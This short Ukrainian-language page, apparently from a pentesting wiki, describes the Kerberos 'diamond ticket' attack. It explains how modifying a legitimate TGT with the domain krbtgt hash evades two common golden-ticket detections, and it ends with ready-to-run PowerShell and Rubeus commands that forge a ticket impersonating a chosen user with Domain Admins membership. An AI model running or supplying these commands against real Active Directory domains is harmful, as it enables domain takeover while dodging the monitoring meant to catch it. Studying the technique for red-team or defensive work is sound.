Алмазний квиток

Подібно до золотого квитка, алмазний квиток є TGT, який може бути використаний для доступу до будь-якої служби як будь-який користувач. Золотий квиток повністю фальсифікується офлайн, шифрується хешем krbtgt цієї доменної системи, а потім передається в сеанс входу для використання. Оскільки контролери домену не відстежують TGT, які вони (або вони) видали законно, вони з радістю приймуть TGT, які зашифровані за допомогою власного хешу krbtgt.

Існують два загальні методи виявлення використання золотих квитків:

• Шукайте TGS-REQs, які не мають відповідного AS-REQ.

• Шукайте TGT з неправдоподібними значеннями, такими як типовий термін дії 10 років Mimikatz.

Алмазний квиток створюється шляхом зміни полів законного TGT, яке видав контролер домену. Це досягається запитом TGT, розшифруванням його за допомогою хешу krbtgt домену, зміною бажаних полів квитка, а потім перезашифруванням його. Це переборює дві вищезгадані недоліки золотого квитка, оскільки:

• TGS-REQs матимуть попередній AS-REQ.

• TGT був виданий контролером домену, що означає, що він матиме всі правильні дані з політики Kerberos домену. Навіть якщо ці дані можна точно підробити в золотому квитку, це складніше і вразливе до помилок.

# Get user RID
powershell Get-DomainUser -Identity <username> -Properties objectsid

.\Rubeus.exe diamond /tgtdeleg /ticketuser:<username> /ticketuserid:<RID of username> /groups:512

# /tgtdeleg uses the Kerberos GSS-API to obtain a useable TGT for the user without needing to know their password, NTLM/AES hash, or elevation on the host.
# /ticketuser is the username of the principal to impersonate.
# /ticketuserid is the domain RID of that principal.
# /groups are the desired group RIDs (512 being Domain Admins).
# /krbkey is the krbtgt AES256 hash.